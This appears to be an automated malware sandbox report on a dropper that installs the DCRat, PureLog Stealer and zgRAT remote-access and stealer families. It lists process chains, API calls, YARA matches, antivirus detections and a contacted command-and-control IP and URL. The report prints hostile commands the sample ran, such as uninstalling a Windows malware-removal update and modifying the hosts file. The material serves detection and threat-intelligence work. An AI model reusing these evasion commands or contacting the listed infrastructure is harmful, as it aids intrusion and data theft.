Code function: 0_2_00007FF7F4D7ECA0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF7F4D7ECA0

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Process created: C:\Users\user\AppData\Local\Temp\GargantuaN.exe "C:\Users\user\AppData\Local\Temp\GargantuaN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Process created: C:\Users\user\AppData\Local\Temp\GargantuanS.exe "C:\Users\user\AppData\Local\Temp\GargantuanS.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\PerfDll\hyperProviderSavesinto.exe "C:\PerfDll/hyperProviderSavesinto.exe"	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\System32\dialer.exe

Code function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

46_2_0000000140001B54

Source: C:\Windows\System32\dialer.exe

Code function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

46_2_0000000140001B54

Source: winlogon.exe, 00000031.00000000.1741644012.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000031.00000002.2885338159.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000031.00000000.1741644012.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000031.00000002.2885338159.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 00000031.00000000.1741644012.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000031.00000002.2885338159.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: winlogon.exe, 00000031.00000000.1741644012.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000031.00000002.2885338159.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Code function: 0_2_00007FF7F4D98DB0 cpuid

0_2_00007FF7F4D98DB0

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: GetLocaleInfoW,GetNumberFormatW,		0_2_00007FF7F4D7DE04
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: GetLocaleInfoW,GetNumberFormatW,		1_2_00D6AF0F

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Queries volume information: C:\PerfDll\hyperProviderSavesinto.exe VolumeInformation	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Queries volume information: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Queries volume information: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\dialer.exe

Code function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

46_2_0000000140001B54

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Code function: 0_2_00007FF7F4D83FCC GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF7F4D83FCC

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Code function: 0_2_00007FF7F4D66768 GetVersionExW,

0_2_00007FF7F4D66768

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: KZcLqgnLvRf.exe, 00000014.00000002.2908332950.000000001B8A0000.00000004.00000020.00020000.00000000.sdmp, KZcLqgnLvRf.exe, 00000014.00000002.2908332950.000000001B942000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000008.00000002.1741648776.0000000012DCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hyperProviderSavesinto.exe PID: 7836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KZcLqgnLvRf.exe PID: 8116, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 1.3.GargantuaN.exe.584d6eb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.GargantuaN.exe.6dc96eb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.GargantuaN.exe.6dc96eb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.hyperProviderSavesinto.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.1698928747.00000000007B2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\PerfDll\hyperProviderSavesinto.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 1.3.GargantuaN.exe.584d6eb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.GargantuaN.exe.6dc96eb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.GargantuaN.exe.6dc96eb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.hyperProviderSavesinto.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\PerfDll\hyperProviderSavesinto.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000008.00000002.1741648776.0000000012DCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hyperProviderSavesinto.exe PID: 7836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KZcLqgnLvRf.exe PID: 8116, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 1.3.GargantuaN.exe.584d6eb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.GargantuaN.exe.6dc96eb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.GargantuaN.exe.6dc96eb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.hyperProviderSavesinto.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.1698928747.00000000007B2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\PerfDll\hyperProviderSavesinto.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 1.3.GargantuaN.exe.584d6eb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.GargantuaN.exe.6dc96eb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.GargantuaN.exe.6dc96eb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.hyperProviderSavesinto.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\PerfDll\hyperProviderSavesinto.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe, type: DROPPED

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
176.123.168.151	unknown	Russian Federation		49342	SPEEDYLINERU	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown

AV Detection

Antivirus detection for URL or domain

Source: https://176.123.168.151	Avira URL Cloud: Label: malware
Source: http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows	Avira URL Cloud: Label: malware
Source: http://176.123.168.151	Avira URL Cloud: Label: malware
Source: https://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Window	Avira URL Cloud: Label: malware
Source: http://176.123.168.151/4track/TesttrafficEternal/private3/Secure7db/7private3/WordpressLocal/Windows/cpuvoiddbtraffic/2Base/ProviderExternalpipeJavascriptupdateSqldbasyncTemporary.php	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe	Avira: detection malicious, Label: TR/Kryptik.gqhhv
Source: C:\Users\user\Desktop\zQhPhksn.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Recovery\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\PerfDll\hyperProviderSavesinto.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\WiKMUFpI.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\WmiPrvSE.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Avira: detection malicious, Label: TR/Kryptik.gqhhv
Source: C:\Users\user\Desktop\LugVktua.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\KEMGRwnV.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt

Multi AV Scanner detection for domain / URL

Source: https://176.123.168.151	Virustotal: Detection: 5%			Perma Link
Source: http://176.123.168.151	Virustotal: Detection: 8%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\PerfDll\hyperProviderSavesinto.exe	ReversingLabs: Detection: 87%
Source: C:\PerfDll\hyperProviderSavesinto.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe	ReversingLabs: Detection: 81%
Source: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe	Virustotal: Detection: 61%	Perma Link
Source: C:\Recovery\RuntimeBroker.exe	ReversingLabs: Detection: 87%
Source: C:\Recovery\RuntimeBroker.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\Recovery\WmiPrvSE.exe	ReversingLabs: Detection: 87%
Source: C:\Recovery\WmiPrvSE.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Virustotal: Detection: 52%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Virustotal: Detection: 61%	Perma Link
Source: C:\Users\user\Desktop\IkSFhrpY.log	Virustotal: Detection: 25%	Perma Link
Source: C:\Users\user\Desktop\KEMGRwnV.log	ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\KEMGRwnV.log	Virustotal: Detection: 69%	Perma Link
Source: C:\Users\user\Desktop\LugVktua.log	Virustotal: Detection: 19%	Perma Link
Source: C:\Users\user\Desktop\WiKMUFpI.log	ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\WiKMUFpI.log	Virustotal: Detection: 69%	Perma Link
Source: C:\Users\user\Desktop\msAjSsFc.log	Virustotal: Detection: 25%	Perma Link
Source: C:\Users\user\Desktop\phOzxInG.log	Virustotal: Detection: 11%	Perma Link
Source: C:\Users\user\Desktop\vsaRQqFM.log	Virustotal: Detection: 11%	Perma Link
Source: C:\Users\user\Desktop\zQhPhksn.log	Virustotal: Detection: 19%	Perma Link
Source: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe	ReversingLabs: Detection: 87%
Source: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe	ReversingLabs: Detection: 87%
Source: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe	Virustotal: Detection: 73%	Perma Link

Multi AV Scanner detection for submitted file

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	ReversingLabs: Detection: 60%
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Virustotal: Detection: 69%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Joe Sandbox ML: detected
Source: C:\Recovery\RuntimeBroker.exe	Joe Sandbox ML: detected
Source: C:\PerfDll\hyperProviderSavesinto.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Joe Sandbox ML: detected
Source: C:\Recovery\WmiPrvSE.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 176.123.168.151:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: GargantuaN.exe, 00000001.00000000.1635712049.0000000000D83000.00000002.00000001.01000000.00000009.sdmp, GargantuaN.exe, 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp, GargantuaN.exe, 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, GargantuaN.exe, 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000000.1628945437.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp, C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D7ECA0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_in